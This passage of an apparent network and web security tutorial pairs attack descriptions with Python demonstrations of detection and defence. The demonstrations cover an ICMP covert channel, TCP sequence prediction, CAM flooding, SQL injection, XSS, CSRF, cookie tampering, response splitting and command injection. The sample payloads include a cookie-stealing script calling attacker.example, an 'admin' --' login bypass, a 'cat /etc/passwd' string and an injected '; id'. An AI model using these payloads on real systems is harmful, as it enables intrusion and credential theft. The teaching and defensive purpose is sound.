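    """Constructed traffic: a SYN scan, an Xmas scan and one ordinary client."""
    recs, t = [], 0.0
    target = "192.0.2.10"
    for port in list(range(1, 31)) + [80, 443]:   # SYN scan from 203.0.113.9
        recs.append((t, "203.0.113.9", 50000, target, port, "S"))
        recs.append((t + 0.001, target, port, "203.0.113.9", 50000,
                     "SA" if port in (22, 80, 443) else "RA"))
        t += 0.01
    for port in range(1, 31):                      # Xmas scan from 203.0.113.77
        recs.append((t, "203.0.113.77", 50001, target, port, "FPU"))
        if port != 22:                             # 22 is open: no reply at all
            recs.append((t + 0.001, target, port, "203.0.113.77", 50001, "RA"))
        t += 0.01
    recs.append((t, "203.0.113.5", 40000, target, 443, "S"))      # an ordinary client
    recs.append((t + 0.001, target, 443, "203.0.113.5", 40000, "SA"))
    recs.append((t + 0.002, "203.0.113.5", 40000, target, 443, "A"))
    return recs

if __name__ == "__main__":
    for scanner, report in detect_scans(sample_records()).items():
        print(scanner, report)
```

A detector that only counts SYNs misses the FIN, NULL and Xmas probes entirely, which is exactly why those scans are called stealthy; keying on "many distinct ports from one source" catches all of them. Slow scans defeat a fixed window, so production tools also keep per-source counters over hours or days.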

    13. Key-Loggers:

    Two types of key loggers are available: software and hardware key loggers.

    Software key loggers:

    These are installed on the computer and programmed to run in the background so that the user cannot notice them. Their purpose is to log all keystrokes; they can also take screenshots and even record mouse clicks, and they can be configured to send this information to a predefined e-mail address. Such loggers are a form of spyware.

    Example

    In 2011 the Pentagon revealed that 24,000 files had been stolen in a cyber-attack. Penetrations of defense industry computer networks have targeted a wide swath of military hardware, including missile tracking systems and drone aircraft. (The reports did not attribute the theft to a particular technique such as keylogging.)


    Hardware key loggers:

    These are plugged in between the keyboard and the computer (PS/2 or USB). Each keystroke passes through the logger first and is stored in its internal memory before being passed on to the host unchanged, so neither the operating system nor the user sees anything unusual. Otherwise it is very similar to a software key logger.

    Ping Sweep:

    Ping Sweep is a technique used to determine which of a range of IP addresses

    map to live hosts. It consists of ICMP ECHO requests sent to multiple hosts. If a

    given address is live, it will return an ICMP ECHO reply.

    14. ICMP Tunneling:

    Tunneling is often used to bypass firewalls that do not block ICMP packets, or to establish a hard-to-trace, possibly encrypted communication channel between two computers without a direct network connection. An ICMP tunnel establishes a covert connection between two remote computers (a client and a proxy) using ICMP echo request and reply packets. An example of this technique is tunneling complete TCP traffic over ping requests and replies.

    15. LOKI Attack:

    LOKI is a client/server program published in the online magazine Phrack. It is a working proof of concept demonstrating that data can be transmitted somewhat secretly across a network by hiding it in traffic that normally does not carry payloads. For example, the code can tunnel the equivalent of a Unix RCMD/RSH session in either ICMP echo request (ping) packets or UDP traffic to the DNS port. It is used as a back door into a Unix system after root access has been compromised, so the presence of LOKI on a system is evidence that the system was compromised in the past.
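How a covert channel of the kind LOKI and ICMP tunnelling use is built, and how it can be spotted, as an added example for sections 14 and 15 (Python written for this page; the framing is an assumption and not LOKI's actual format): it serialises ICMP echo requests with a correct checksum, carries a message across several of them, reassembles it on the other side, and flags echo payloads that do not match the stock ping patterns of Windows or iputils. The sample message and the identifier are constructed.

```python
import struct

def icmp_checksum(data):
    """Standard Internet checksum (RFC 1071) over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF

def build_echo(ident, seq, payload, request=True):
    """Serialise an ICMP echo request (type 8) or reply (type 0)."""
    icmp_type = 8 if request else 0
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload

def parse_echo(packet):
    """Return (type, ident, seq, payload); a corrupted packet fails the checksum."""
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]

# --- the covert channel (assumed framing, not LOKI's real format) ---
MAGIC = b"TUN1"

def tunnel_encode(message, ident=0x1234, chunk=32):
    """Split a message across echo requests; the sequence number orders the chunks."""
    return [build_echo(ident, seq, MAGIC + message[off:off + chunk])
            for seq, off in enumerate(range(0, len(message), chunk))]

def tunnel_decode(packets, ident=0x1234):
    parts = {}
    for pkt in packets:
        _type, i, seq, data = parse_echo(pkt)
        if i == ident and data.startswith(MAGIC):
            parts[seq] = data[len(MAGIC):]
    return b"".join(parts[k] for k in sorted(parts))

# --- the detector: stock ping payloads are predictable, tunnel payloads are not ---
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"   # the 32-byte Windows ping payload

def is_stock_payload(data):
    if data == WINDOWS_PING_DATA:
        return True
    # iputils ping (assumed layout): a timestamp, then byte i holds the value i & 0xff
    for ts_len in (8, 16):
        if len(data) > ts_len and all(data[i] == (i & 0xFF) for i in range(ts_len, len(data))):
            return True
    return False

def suspicious_echoes(packets):
    """Sequence numbers of echo packets whose payload is not a stock ping payload."""
    return [seq for _t, _i, seq, data in map(parse_echo, packets) if not is_stock_payload(data)]

# Constructed samples.
SECRET = b"covert channel test: id;uname -a;cat /etc/passwd " * 2   # 98 bytes -> 4 chunks of 32
LINUX_PING = build_echo(0x0001, 1, bytes(16) + bytes(range(16, 56)))  # 56-byte stock payload
WINDOWS_PING = build_echo(0x0001, 1, WINDOWS_PING_DATA)

if __name__ == "__main__":
    pkts = tunnel_encode(SECRET)
    print(len(pkts), "echo requests carry", len(SECRET), "bytes")
    print("decoded ok:", tunnel_decode(pkts) == SECRET)
    print("flagged:", suspicious_echoes(pkts + [LINUX_PING, WINDOWS_PING]))
```

Payload inspection is the cheap check; the robust one is volume and shape, since a tunnel produces sustained echo traffic with varying payload sizes between the same two hosts, and a firewall that must allow ping can still rate-limit it and strip or normalise the payload.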


    Example (a rogue antivirus redirect rather than an ICMP tunnel)

    Office.Microsoft.com search results can lead to rogue antivirus: Websense Security Labs and the Websense ThreatSeeker Network detected that search results on office.microsoft.com could lead users to a rogue AV page. Users looking for help with Office products on Microsoft's own site were being targeted. Users may be unaware that when they type search queries on the site, Microsoft scours its own website for results but also pulls in results from the broader Web. Since the URL for the search results begins with http://office.microsoft.com, this is particularly troubling for users who trust sites simply because of their reputation. The malicious URL served as a redirect to a very real-looking virus scan and warning page presented by a rogue AV. At the time of discovery, the executable used in the attack was recognized by only one of the 41 AV engines on VirusTotal.

    16. TCP Sequence Attack:

    A TCP sequence prediction attack is an attempt to predict the sequence number that will be used to identify the segments of a TCP connection. With a correct prediction the attacker can forge segments that the receiver accepts as genuine, which leads to session hijacking; with a spoofed source address he can do so blind, without ever seeing the victim's replies.
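The prediction and the acceptance test behind sections 8 and 16, as an added example (Python written for this page, not from the white paper): an attacker samples a few initial sequence numbers, predicts the next one, and sends a segment that the victim's RFC 793 window check accepts; the same attack against hashed, RFC 6528-style ISNs fails. The generators and the secret are assumptions.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF

def predict_next_isn(observed):
    """If successive ISNs differ by a constant, return the predicted next one, else None."""
    deltas = {(b - a) & MASK for a, b in zip(observed, observed[1:])}
    if len(observed) >= 2 and len(deltas) == 1:
        return (observed[-1] + deltas.pop()) & MASK
    return None

def weak_isn_generator(start=1000, step=64000):
    """The old fixed-increment scheme: trivially predictable from a few samples."""
    isn = start
    while True:
        yield isn & MASK
        isn += step

def strong_isn_generator(secret=b"assumed-per-boot-secret"):
    """RFC 6528 style: ISN = clock + hash(secret, connection); modelled here with a
    counter standing in for the connection 4-tuple so the example is deterministic."""
    counter = 0
    while True:
        counter += 1
        digest = hashlib.sha256(secret + struct.pack("!Q", counter)).digest()
        yield struct.unpack("!I", digest[:4])[0]

def segment_accepted(rcv_nxt, rcv_wnd, seg_seq, seg_len):
    """RFC 793 acceptability test: does any byte of the segment fall inside the
    receive window? Modular arithmetic keeps the check correct across wraparound."""
    def inside(x):
        return ((x - rcv_nxt) & MASK) < rcv_wnd
    if seg_len == 0:
        return seg_seq == rcv_nxt if rcv_wnd == 0 else inside(seg_seq)
    return rcv_wnd > 0 and (inside(seg_seq) or inside((seg_seq + seg_len - 1) & MASK))

def blind_injection(isn_source, rcv_wnd=65535, seg_len=100):
    """The attacker samples four ISNs, predicts the next connection's ISN and sends a
    segment with that sequence number; the victim's actual ISN is drawn next.
    Returns (predicted, actual, accepted)."""
    samples = [next(isn_source) for _ in range(4)]
    predicted = predict_next_isn(samples)
    actual = next(isn_source)
    accepted = predicted is not None and segment_accepted(actual, rcv_wnd, predicted, seg_len)
    return predicted, actual, accepted

if __name__ == "__main__":
    print("weak  :", blind_injection(weak_isn_generator()))
    print("strong:", blind_injection(strong_isn_generator()))
```

Note that the receiver accepts any segment whose bytes land anywhere in a 64 KB window, not only an exact sequence match; that is why a merely "somewhat random" ISN is not enough and why RFC 5961 tightened the checks for RST and SYN segments.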

    17. CAM Table Overflow:

    A switch's CAM table holds network information such as the MAC addresses seen on each physical switch port and the associated VLAN parameters. A CAM table overflow occurs when the switch is flooded with frames carrying many different source MAC addresses until the table's capacity is reached. The switch then acts like a hub and floods frames for unknown destinations out of all ports. The flooding caused by a CAM table overflow is limited to the source VLAN and does not affect other VLANs on the network.
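A bounded CAM table and what happens when it fills, as an added example for the MAC flood and CAM overflow sections (Python written for this page, not from the white paper): a toy learning switch with eight entries, two hosts, an attacker spraying forged source MACs, and the same run with port security limiting each port to two addresses. The eviction policy, table size and MAC addresses are assumptions.

```python
from collections import Counter, OrderedDict, defaultdict

class Switch:
    """Toy learning switch with a bounded CAM table and optional port security."""

    def __init__(self, ports, cam_size=8, max_macs_per_port=None):
        self.ports = list(ports)
        self.cam = OrderedDict()               # mac -> port, oldest entry first (eviction policy assumed)
        self.cam_size = cam_size
        self.max_macs_per_port = max_macs_per_port
        self.port_macs = defaultdict(set)
        self.err_disabled = set()
        self.stats = Counter()

    def _learn(self, mac, port):
        if mac in self.cam:
            self.port_macs[self.cam[mac]].discard(mac)
            self.cam.move_to_end(mac)
        elif len(self.cam) >= self.cam_size:
            old_mac, old_port = self.cam.popitem(last=False)   # table full: drop the oldest
            self.port_macs[old_port].discard(old_mac)
            self.stats["evicted"] += 1
        self.cam[mac] = port
        self.port_macs[port].add(mac)

    def forward(self, in_port, src_mac, dst_mac):
        """Return the list of egress ports for one frame."""
        if in_port in self.err_disabled:
            self.stats["dropped_err_disabled"] += 1
            return []
        if (self.max_macs_per_port is not None and src_mac not in self.port_macs[in_port]
                and len(self.port_macs[in_port]) >= self.max_macs_per_port):
            self.err_disabled.add(in_port)     # port security violation: shut the port
            self.stats["port_security_violations"] += 1
            return []
        self._learn(src_mac, in_port)
        if dst_mac in self.cam:
            out = self.cam[dst_mac]
            self.stats["unicast"] += 1
            return [] if out == in_port else [out]
        self.stats["flooded"] += 1             # unknown destination: behave like a hub
        return [p for p in self.ports if p != in_port]

A, B = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"

def run_flood(port_security):
    """Hosts A (port 1) and B (port 2) talk; an attacker on port 3 sprays 100 forged
    source MACs; then A sends to B again. Returns (egress ports of that last frame, stats)."""
    sw = Switch(ports=[1, 2, 3], cam_size=8, max_macs_per_port=2 if port_security else None)
    sw.forward(1, A, B)                # A learned; B still unknown -> flooded once
    sw.forward(2, B, A)                # B learned; A known -> unicast to port 1
    for i in range(100):               # the MAC flood (constructed, the kind of stream macof sends)
        sw.forward(3, "02:00:00:00:%02x:%02x" % (i // 256, i % 256), BROADCAST)
    return sw.forward(1, A, B), sw.stats

if __name__ == "__main__":
    print("no port security :", run_flood(False))
    print("port security    :", run_flood(True))
```

Without port security the attacker's port 3 receives the A-to-B frame, which is the whole point of the attack; with it the third forged address err-disables the port and the switch keeps forwarding normally.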


    ICMP Redirect Attacks:

    ICMP redirect messages tell a source host to use a different gateway that may be closer to the destination. A redirect is sent by the gateway that received the packet, and the source host adjusts its forwarding accordingly. Because hosts typically accept redirects without any authentication, an attacker on the same segment can send forged redirects that route the victim's traffic through himself, setting up a man-in-the-middle position; redirects can also be used to amplify Smurf or Fraggle attacks. Hosts should be configured to ignore ICMP redirects.

    Example

    In June 2009 the P2P site The Pirate Bay was rendered inaccessible by a denial-of-service attack (reported at the time as a DDoS rather than specifically an ICMP redirect attack). It was most likely provoked by the recently announced sale to Global Gaming Factory X AB, which was seen as a "take the money and run" solution to the website's legal issues. In the end, because of the buyer's financial troubles, the site was not sold.

    DNS Zone Transfer Attack:

    A zone transfer (AXFR) request to a DNS server returns a complete list of hostnames and IP addresses in the domain. Ordinarily, zone transfers should only occur between the authoritative name servers for a domain. Attackers request transfers in order to compile a list of possible hosts to attack. Servers should restrict transfers to their secondary servers (and authenticate them with TSIG), and IDS signatures commonly flag attempted zone transfers from sources other than those servers. A quick check is to request an AXFR for your own zone from each public name server with a tool such as dig and confirm that it is refused.


    18. WEB APPLICATION ATTACKS:

    SQL Injection:

    Also called an SQL insertion attack, this lets the attacker execute SQL of his own choosing because user input is concatenated into a query without proper handling at the database layer of the application. The injected SQL can read confidential data, modify it, or even compromise the application or the server itself.
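The vulnerable pattern and its fix, as an added example (Python written for this page, not from the white paper): a login check that splices the user name into the SQL text, beside the parameterised version, run against a constructed in-memory SQLite table.

```python
import sqlite3

def make_db():
    """In-memory users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "hash(alice-pw)", "user"), ("admin", "hash(admin-pw)", "admin")])
    db.commit()
    return db

def login_vulnerable(db, username, password_hash):
    # User input is pasted into the SQL text, so quotes in the input change the query.
    sql = (f"SELECT role FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password_hash):
    # Parameterised query: the driver passes the values separately from the SQL grammar,
    # so a quote in the input can only ever be compared as data.
    sql = "SELECT role FROM users WHERE username = ? AND password_hash = ?"
    row = db.execute(sql, (username, password_hash)).fetchone()
    return row[0] if row else None

# Classic authentication bypass: close the string, then comment out the password check.
BYPASS = "admin' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, BYPASS, "wrong"))   # admin, without a password
    print("safe      :", login_safe(db, BYPASS, "wrong"))         # no such user
```

The vulnerable query becomes SELECT role FROM users WHERE username = 'admin' --' AND password_hash = 'wrong', and everything after the comment marker is ignored; the parameterised version looks for a user literally named "admin' --" and finds none.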

    Example

    In July 2011 the group Anonymous claimed to have hacked NATO using a "simple SQL injection."

    On 8 November 2010 the British Royal Navy website was compromised by TinKode using SQL injection.

    Cross-Site Scripting:

    Cross-site scripting (XSS) holes are web application vulnerabilities that allow attackers to bypass the client-side security mechanisms (such as the same-origin policy) that modern browsers normally impose on web content. By finding ways of injecting malicious scripts into web pages, an attacker can gain access to sensitive page content, session cookies, and a variety of other information the browser maintains on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection, and the defence is to encode untrusted data for the context (HTML body, attribute, JavaScript, URL) in which it is placed.
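Context-aware output encoding, as an added example (Python written for this page, not from the white paper): the same untrusted input rendered raw and encoded in three contexts (HTML body, attribute value, inline script), with constructed payloads that show what each raw rendering lets through.

```python
import html
import json

# Constructed attacker inputs, one per rendering context.
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'
JS_PAYLOAD = '</script><script>alert(1)</script>'

def render_comment_vulnerable(comment):
    return f"<p>{comment}</p>"                      # raw interpolation: HTML body context

def render_comment_safe(comment):
    return f"<p>{html.escape(comment, quote=True)}</p>"

def render_field_vulnerable(value):
    return f'<input name="q" value="{value}">'      # raw interpolation: attribute context

def render_field_safe(value):
    return f'<input name="q" value="{html.escape(value, quote=True)}">'

def render_js_vulnerable(value):
    return f"<script>var q = '{value}';</script>"   # raw interpolation: script context

def render_js_safe(value):
    # JSON-encode, then make sure the value cannot close the enclosing <script> element.
    encoded = json.dumps(value).replace("</", "<\\/")
    return f"<script>var q = {encoded};</script>"

def open_script_tags(markup):
    """Crude measure of whether a payload gained execution in body context."""
    return markup.lower().count("<script")

def close_script_tags(markup):
    """In script context the danger is breaking out of the element, i.e. extra </script>."""
    return markup.lower().count("</script>")

if __name__ == "__main__":
    for vulnerable, safe, payload in [(render_comment_vulnerable, render_comment_safe, BODY_PAYLOAD),
                                      (render_field_vulnerable, render_field_safe, ATTR_PAYLOAD),
                                      (render_js_vulnerable, render_js_safe, JS_PAYLOAD)]:
        print(vulnerable(payload))
        print(safe(payload))
        print()
```

HTML-escaping alone is not enough for the attribute case unless quotes are escaped too (hence quote=True), and it is the wrong tool for the script case, where JSON encoding plus neutralising "</" is what keeps the value inside the string. Templating engines with auto-escaping do this for the body and attribute contexts; the script context usually still needs explicit handling.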


    Example

    TJX Companies, owner of T.J. Maxx, Marshalls, Winners, HomeGoods, A.J. Wright and Bob's Stores, fell prey to one of the worst hacking incidents to date. On 17 January 2007 the company disclosed that the details of some 40 million customer credit and debit cards had been stolen. In parallel, the federal credit union SEFCU published a similar warning that the personal details of 10,000 of its customers had been compromised. (The TJX intrusion began with a poorly secured wireless network at a store rather than a cross-site scripting flaw.)

Cross-Site Request Forgery:

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
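The standard defence against the trust relationship described above is a per-session anti-forgery token that the site embeds in its own forms and checks on every state-changing request; a page on another origin can make the victim's browser send the session cookie, but it cannot read the token to include it. The following is an added example for this page, not code from the DSCI paper; the in-memory session store and the response strings are constructed for the illustration.

```python
import hmac
import secrets
from typing import Dict

# Constructed in-memory session store: session_id -> session data.
SESSIONS: Dict[str, dict] = {}


def new_session() -> str:
    """Create a session and mint a random anti-forgery token for it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The value the server writes into its own forms as a hidden field."""
    return SESSIONS[sid]["csrf_token"]


def handle_state_changing_post(sid: str, form: dict) -> str:
    """Server side of a POST that changes state (e.g. change e-mail address).
    sid comes from the session cookie, form from the request body."""
    session = SESSIONS.get(sid)
    if session is None:
        return "401 no session"
    submitted = str(form.get("csrf_token", ""))
    # constant-time comparison so the token cannot be guessed byte by byte
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return "403 csrf token missing or wrong"
    return "200 action performed"


if __name__ == "__main__":
    sid = new_session()
    print(handle_state_changing_post(sid, {"csrf_token": csrf_token_for(sid)}))
    print(handle_state_changing_post(sid, {}))  # what a forged cross-site form looks like
```

Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer, since the browser then withholds the cookie from most cross-site requests in the first place.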

Example

In June 2011 Google discovered that a number of its Gmail account user names and passwords of personal accounts belonging to senior government officials, activists, and journalists had been compromised. The hack appears to have originated from Jinan, China, although Google did not accuse any individuals or governments of orchestrating the attack. Chinese Foreign Affairs Minister Hong Lei denied being the source. Similar spear phishing attempts were also discovered in Hotmail and Yahoo Mail.

Cookie Poisoning Attack:

Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user's computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity.

Cookie Stealing:

These types of attacks are carried out by client-side scripts such as JavaScript. When the user clicks on a link, the script looks through the cookies held in the computer's memory for all the active cookies and sends them (apparently by e-mail) to the attacker.
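Both cookie attacks above have a server-side mitigation that can be shown together: signing the cookie value so that a poisoned (edited) cookie is rejected, and setting the HttpOnly, Secure and SameSite attributes so that page scripts cannot read the cookie and the browser will not send it over cleartext or with most cross-site requests. This is an added example for this page, not code from the DSCI paper; the signing key and the session data are constructed for the illustration, and `poison()` only simulates the edit an attacker would make to their own cookie.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed server-side secret; in practice load it from a key store.
SERVER_KEY = b"example-only-key-do-not-reuse"


def _sign(payload: bytes) -> str:
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()


def _encode(data: dict) -> str:
    return base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()


def make_cookie_value(data: dict) -> str:
    """Serialize session data and append an HMAC so any edit is detectable."""
    payload = _encode(data)
    return f"{payload}.{_sign(payload.encode())}"


def read_cookie_value(value: str) -> Optional[dict]:
    """Return the data, or None if the cookie was altered or malformed."""
    try:
        payload, sig = value.rsplit(".", 1)
    except ValueError:
        return None
    if not hmac.compare_digest(sig.encode(), _sign(payload.encode()).encode()):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(payload.encode()))
    except (ValueError, UnicodeDecodeError):
        return None


def set_cookie_header(name: str, value: str) -> str:
    """HttpOnly hides the value from document.cookie (the cookie-stealing
    script above gets nothing); Secure keeps it off plain HTTP; SameSite
    limits cross-site sending."""
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


def poison(value: str, new_data: dict) -> str:
    """Simulate the poisoning attack: rewrite the data, keep the old signature."""
    _, sig = value.rsplit(".", 1)
    return f"{_encode(new_data)}.{sig}"


if __name__ == "__main__":
    cookie = make_cookie_value({"user": "alice", "role": "user"})
    print(set_cookie_header("session", cookie))
    print("genuine :", read_cookie_value(cookie))
    print("poisoned:", read_cookie_value(poison(cookie, {"user": "alice", "role": "admin"})))
```

Signing prevents tampering but not disclosure; the cookie body above is only base64, so secrets should still not be stored in it, and the attributes on the Set-Cookie line are what address the stealing case.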

Phishing Attacks:

Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

Web Defacement Attack:

Website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Most probably, these kinds of attacks are done intentionally to spoil the reputation of the company that has hosted this website.

Buffer Overflow:

A buffer overflow, or buffer overrun, is an anomaly where a process stores data in a buffer outside the memory the programmer set aside for it. The extra data overwrites adjacent memory, which may contain other data, including program variables and program flow control data. This may result in memory access errors, incorrect results, program termination, or a breach of system security. This vulnerability is entirely a programmer's mistake.

Forced Browsing:

Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible. For example, directories like config, backup and logs which can be accessed can reveal a lot of information about the application itself, passwords, activities, etc.
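Enumeration of the kind described above leaves a recognisable trail in the web server's access log: one client requesting paths the application never links to. The following is an added detection example for this page, not code from the DSCI paper; the log lines, client addresses and the list of unreferenced path prefixes are constructed for the illustration.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed access-log lines, Apache common-log style:
# client - - [time] "METHOD /path HTTP/1.1" status bytes
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [27/Apr/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120
203.0.113.9 - - [27/Apr/2011:10:00:02 +0000] "GET /backup/ HTTP/1.1" 403 210
203.0.113.9 - - [27/Apr/2011:10:00:03 +0000] "GET /config/ HTTP/1.1" 404 210
203.0.113.9 - - [27/Apr/2011:10:00:04 +0000] "GET /logs/access.log HTTP/1.1" 200 88231
198.51.100.4 - - [27/Apr/2011:10:00:05 +0000] "GET /about.html HTTP/1.1" 200 3100
"""

# Path prefixes the application never references; any request to them is
# either enumeration or a leak. Constructed for the example.
UNREFERENCED_PREFIXES = ("/backup/", "/config/", "/logs/", "/.git/")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def scan_forced_browsing(lines: Iterable[str]) -> Dict[str, List[Tuple[str, int]]]:
    """Group requests for unreferenced paths by client address.
    Returns {client_ip: [(path, status), ...]}. A 200 means the resource
    was actually exposed; a 403 or 404 still shows enumeration in progress."""
    hits: Dict[str, List[Tuple[str, int]]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash the scan
        path = m.group("path")
        if path.startswith(UNREFERENCED_PREFIXES):
            hits[m.group("ip")].append((path, int(m.group("status"))))
    return dict(hits)


def exposed_resources(hits: Dict[str, List[Tuple[str, int]]]) -> List[str]:
    """Paths that were served successfully and therefore need removing or
    access-controlling, regardless of who asked."""
    return sorted({path for entries in hits.values() for path, status in entries if status == 200})


if __name__ == "__main__":
    result = scan_forced_browsing(SAMPLE_ACCESS_LOG.splitlines())
    for ip, entries in result.items():
        print(ip, "probed", len(entries), "unreferenced paths:", entries)
    print("exposed:", exposed_resources(result))
```

The fix on the server side is to keep such directories outside the document root or behind explicit access control, so that the scan finds nothing to report with status 200.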

Example

Over a period of 4 hours on Wednesday, April 27, 2011, an automated SQL injection attack occurred on the Broadband Reports website that was able to extract 8% of the username/password pairs: 8,000 random accounts of the 9,000 active and 90,000 old or inactive accounts.

HTTP Response Splitting:

An attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. This attack by itself does not cause any harm, but it can lead to other serious attacks such as XSS.
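The header-splitting condition described above depends on a carriage return or line feed reaching the header block, because that is what ends one header line and starts the next. The example below (added for this page, not code from the DSCI paper) builds a redirect response the vulnerable way and the validated way, and counts how many header lines a client would see in each; the redirect target string is constructed for the illustration.

```python
from typing import List

# Constructed input for a redirect parameter that carries a CRLF pair.
# Against the vulnerable builder it adds a second header line.
CRLF_INPUT = "/home\r\nX-Injected: 1"


class HeaderInjection(ValueError):
    """Raised when a value that must be a single header line is not."""


def build_redirect_vulnerable(target: str) -> str:
    """Reflects the parameter into the Location header verbatim."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n"


def safe_header_value(value: str) -> str:
    """Reject CR, LF and NUL in a header value. Header values are one line
    by definition, so there is no legitimate reason for these bytes."""
    if any(ch in value for ch in ("\r", "\n", "\x00")):
        raise HeaderInjection("CR/LF/NUL in header value")
    return value


def build_redirect_safe(target: str) -> str:
    """Same response, but the value is validated before it is used."""
    return f"HTTP/1.1 302 Found\r\nLocation: {safe_header_value(target)}\r\n\r\n"


def is_safe_redirect_target(target: str) -> bool:
    try:
        safe_header_value(target)
    except HeaderInjection:
        return False
    return True


def header_lines(response: str) -> List[str]:
    """The header lines a client would parse: everything after the status
    line and before the first blank line."""
    head = response.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")[1:]


if __name__ == "__main__":
    print(header_lines(build_redirect_vulnerable(CRLF_INPUT)))  # two headers
    print(header_lines(build_redirect_safe("/home")))            # one header
    print(is_safe_redirect_target(CRLF_INPUT))                   # False
```

Most mature web frameworks already apply this check when a header is set through their API; the risk remains in code that writes headers by string concatenation, as the vulnerable builder does.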

Example

A hacker infiltrated a massive database from the University of California, Los Angeles, containing personal information (including social security numbers, dates of birth, home addresses and contact information) on 800,000 people, in one of the worst computer breaches ever at a US university.

Injection Flaws:

Injection flaws allow attackers to relay malicious code through a web application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to backend databases via SQL (i.e., SQL injection). Whole scripts written in Perl, Python, and other languages can be injected into poorly designed web applications and executed. Any time a web application uses an interpreter of any type there is a danger of an injection attack.
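The shell-command case in the paragraph above is the one most often written by hand, so it is the one shown here as an added example for this page (not code from the DSCI paper): a host parameter spliced into a command line, beside the hardened form that validates the value against a strict pattern and hands the command to the operating system as an argument list with no shell in between. The `ping` command and the hostname pattern are assumptions made for the illustration.

```python
import re
import shlex
import subprocess
from typing import List

# Allow-list pattern for a DNS hostname: labels of letters, digits and
# hyphens, not starting with a hyphen (so the value cannot be read as an
# option flag either). Constructed for the example.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(host: str) -> str:
    """The injection flaw: the value is spliced into a shell command line,
    so shell metacharacters in it are interpreted. Returned as a string
    only, to make the problem visible; never executed here."""
    return f"ping -c 1 {host}"


def shell_tokens(cmdline: str) -> List[str]:
    """How a POSIX shell would tokenize the line (';', '|', '&' become
    separate operators), which shows where a second command appears."""
    return list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))


def is_valid_hostname(host: str) -> bool:
    return len(host) <= 253 and HOSTNAME_RE.match(host) is not None


def ping_argv_safe(host: str) -> List[str]:
    """Hardened form: reject anything outside the allow-list, then build an
    argv list for subprocess with the default shell=False."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Execute the safe form; no shell parses the hostname."""
    return subprocess.run(ping_argv_safe(host), check=False).returncode


if __name__ == "__main__":
    probe = "example.com; id"
    print(shell_tokens(ping_command_vulnerable(probe)))  # ';' and 'id' appear as their own tokens
    print(is_valid_hostname(probe), is_valid_hostname("example.com"))
    print(ping_argv_safe("example.com"))
```

The argv list is the essential part: even with validation, passing a string through a shell means every future change to the pattern has to reason about shell syntax, whereas an argument list never reaches a shell at all.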

Example

On December 4, 2010, a group calling itself the Pakistan Cyber Army hacked the website of India's top investigating agency, the Central Bureau of Investigation (CBI).

In 2010 a clickjacking worm that forced hundreds of thousands of unsuspecting Facebook users to unknowingly post spam messages on their profiles spread rapidly through the social networking website over the weekend. The worm used catchy news headlines to lure its victims.

19. Virus:

